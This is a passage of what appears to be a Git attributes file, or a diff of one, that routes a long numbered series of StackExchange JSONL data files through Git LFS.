filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1624_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1625_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1626_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1627_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1628_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1629_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/162_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1630_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1631_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1632_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1633_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1634_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1635_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1636_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1637_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1638_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1639_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/163_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1640_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1641_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1642_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1643_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1644_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1645_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1646_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1647_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1648_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1649_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/164_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1650_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1651_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1652_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1653_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1654_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1655_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1656_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1657_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1658_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1659_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/165_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1660_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1661_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1662_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1663_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1664_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1665_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1666_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1667_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1668_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1669_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/166_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1670_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1671_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1672_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1673_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1674_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1675_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1676_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1677_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1678_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1679_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/167_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1680_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1681_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1682_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1683_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1684_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1685_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1686_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1687_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1688_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1689_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/168_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1690_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1691_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1692_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1693_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1694_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1695_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1696_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1697_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1698_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1699_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/169_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/16_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1700_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1701_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1702_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1703_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1704_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1705_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1706_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1707_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1708_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1709_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/170_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1710_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1711_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1712_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1713_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1714_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1715_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1716_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1717_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1718_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1719_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/171_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1720_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1721_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1722_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1723_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1724_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1725_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1726_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1727_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1728_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1729_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/172_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1730_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1731_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1732_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1733_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1734_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1735_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1736_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1737_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1738_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1739_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/173_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1740_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1741_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1742_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1743_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1744_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1745_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1746_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1747_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1748_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1749_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/174_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1750_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1751_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1752_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1753_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1754_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1755_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1756_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1757_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1758_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1759_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/175_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1760_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1761_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1762_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1763_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1764_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1765_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1766_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1767_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1768_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1769_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/176_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1770_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1771_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1772_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1773_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1774_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1775_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1776_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1777_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1778_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1779_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/177_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1780_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1781_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1782_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1783_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1784_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1785_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1786_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1787_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1788_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1789_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/178_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1790_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1791_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1792_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1793_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1794_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1795_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1796_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1797_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1798_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1799_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/179_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/17_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1800_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1801_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1802_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1803_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1804_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1805_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1806_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1807_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1808_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1809_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/180_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1810_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1811_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1812_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1813_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1814_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1815_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1816_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1817_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1818_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1819_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/181_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1820_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1821_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1822_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1823_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1824_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1825_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1826_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1827_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1828_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1829_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/182_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1830_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1831_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1832_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1833_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1834_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1835_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1836_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1837_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1838_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1839_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/183_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1840_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1841_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1842_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1843_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1844_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1845_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1846_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1847_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1848_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1849_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/184_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1850_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1851_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1852_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1853_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1854_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1855_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1856_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1857_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1858_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1859_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/185_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1860_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1861_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1862_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1863_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1864_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1865_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1866_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1867_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1868_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1869_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/186_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1870_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1871_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1872_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1873_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1874_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1875_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1876_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1877_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1878_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1879_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/187_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1880_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1881_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1882_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1883_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1884_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1885_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1886_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1887_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1888_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1889_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/188_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1890_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1891_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1892_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1893_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1894_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1895_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1896_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1897_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1898_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1899_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/189_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/18_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1900_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1901_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1902_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1903_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1904_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1905_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1906_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1907_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1908_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1909_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/190_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1910_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1911_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1912_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1913_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1914_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1915_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1916_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1917_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1918_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1919_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/191_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1920_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1921_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1922_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1923_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1924_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1925_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1926_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1927_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1928_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1929_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/192_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1930_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1931_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1932_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1933_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1934_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1935_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1936_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1937_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1938_2289.jsonl filter=lfs diff=lfs merge=lfs -text 